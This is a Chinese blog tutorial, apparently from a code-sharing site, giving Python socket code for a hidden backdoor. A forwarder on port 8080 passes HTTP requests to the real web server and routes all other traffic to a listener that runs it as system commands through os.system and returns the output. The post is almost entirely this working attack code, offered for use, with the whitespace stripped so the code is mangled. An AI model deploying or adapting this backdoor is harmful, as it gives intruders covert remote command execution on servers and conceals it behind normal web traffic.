python基于socket进行端口转发实现后门隐藏的示例
思想:
用户正常浏览器访问请求通过8080端口,请求若为http请求,则正常转发到80端口保证网站正常运行。否则转发到8888端口执行系统命令。
8888端口监听代码:
#!/usr/bin/envpython
fromsocketimport*
importos
HOST='127.0.0.1'
PORT=8888
BUFSIZE=1024
ADDR=(HOST,PORT)
tcpSerSock=socket(AF_INET,SOCK_STREAM)
tcpSerSock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcpSerSock.bind(ADDR)
tcpSerSock.listen(5)
whileTrue:
print("waitingforconnection...")
tcpCliSock,addr=tcpSerSock.accept()
print("...connectedfrom:",addr)
whileTrue:
data=tcpCliSock.recv(BUFSIZE)
ifnotdata:
break
info=data.split('\n')
command=info[0]
try:
os.system(command+">command.txt");
file=open('command.txt')
data=""
forlineinfile:
data=data+line;
tcpCliSock.send(data)
exceptException:
tcpCliSock.send("Nothingtodo")
tcpCliSock.close()
tcpSerSock.close()
8080端口转发代码:
#!/usr/bin/python
fromsocketimport*
tcp1=socket(AF_INET,SOCK_STREAM)
tcp1.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcp1.bind(('0.0.0.0',8080))
tcp1.listen(10)
BUFFER_SIZE=2048
tcpCliSock,addr=tcp1.accept()
whileTrue:
data=tcpCliSock.recv(BUFFER_SIZE)
if'HTTP'indata:
tcp3=socket(AF_INET,SOCK_STREAM)
tcp3.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcp3.connect(('127.0.0.1',80))
tcp3.send(data)
htmlinfo=tcp3.recv(2048)
ifnothtmlinfo:
tcp3.close()
else:
tcpCliSock.send(htmlinfo)
else:
tcp2=socket(AF_INET,SOCK_STREAM)
tcp2.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
tcp2.connect(('127.0.0.1',8888))
data=data.replace("\n","")
printdata
tcp2.send(data)
commandinfo=tcp2.recv(1024)
tcpCliSock.send(commandinfo)
tcp2.close()
tcpCliSock.close()
tcp1.close()
有些地方还有些小问题等待修正,但是linux下是可以完美运行的。欢迎学习交流。
以上这篇python基于socket进行端口转发实现后门隐藏的示例就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持毛票票。